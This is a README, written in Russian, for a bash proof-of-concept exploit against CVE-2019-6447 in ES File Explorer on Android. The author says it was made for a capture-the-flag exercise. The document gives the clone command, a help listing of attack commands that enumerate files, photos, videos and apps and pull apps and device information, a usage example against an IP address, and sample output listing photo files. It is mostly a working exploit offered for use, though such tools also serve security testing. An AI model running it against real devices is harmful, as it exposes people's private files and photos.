
Bash PoC-скрипт, эксплуатирующий CVE-2019-6447 в ES File Explorer для перечисления файлов, фотографий, видео, приложений и загрузки файлов с уязвимых Android-устройств.

Это очень простая реализация на bash PoC для CVE-2019-6447. Она использует curl для отправки запросов с правильными параметрами. Я создал её, так как во время CTF искал подобный скрипт и не нашёл. Вы можете поиграть с оригинальным скриптом и настроить его по своему усмотрению.
Просто клонируйте репозиторий и используйте .sh файл.
git clone [email protected]:julio-cfa/POC-ES-File-Explorer-CVE-2019-6447.git
Или скопируйте и вставьте сырое содержимое в файл.
kyoto :: ~ % ./ESExplorerExploit.sh -h
--- This is a very simple PoC of the ES File Explorer CVE-2019-6447 ---
You can try the following commands:
listFiles List all files
listPics List all pictures
listVideos List all videos
listAudios List all audios
listApps List all applications installed
listAppsSystem List system apps
listAppsPhone List communication related applications
listAppsSdcard List the apps installed on the sd card
listAppsAll List all applications
getAppThumbnail List icons for the specified application
appLaunch Start the developed application
appPull Download an application from your device
getDeviceInfo Get system information
Usage example: ./ESExplorerExploit.sh 10.10.10.247 sdcard listFiles
kyoto :: ~ % ./ESExplorerExploit.sh 10.10.10.247 sdcard/DCIM listFiles
[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", },
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", },
{"name":"example3.jpg", "time":"4/21/21 02:38:18 AM", "type":"file", "size":"1.14 MB (1,200,401 Bytes)", },
{"name":"example4.png", "time":"4/21/21 02:37:21 AM", "type":"file", "size":"124.88 KB (127,876 Bytes)", }
]
Если вам интересно, как работает этот эксплойт, или в случае неудачи нужно создать собственный скрипт, можете прочитать следующие ссылки:
https://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.html
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
https://www.safe.security/assets/img/research-paper/pdf/es-file-explorer-vulnerability.pdf
https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566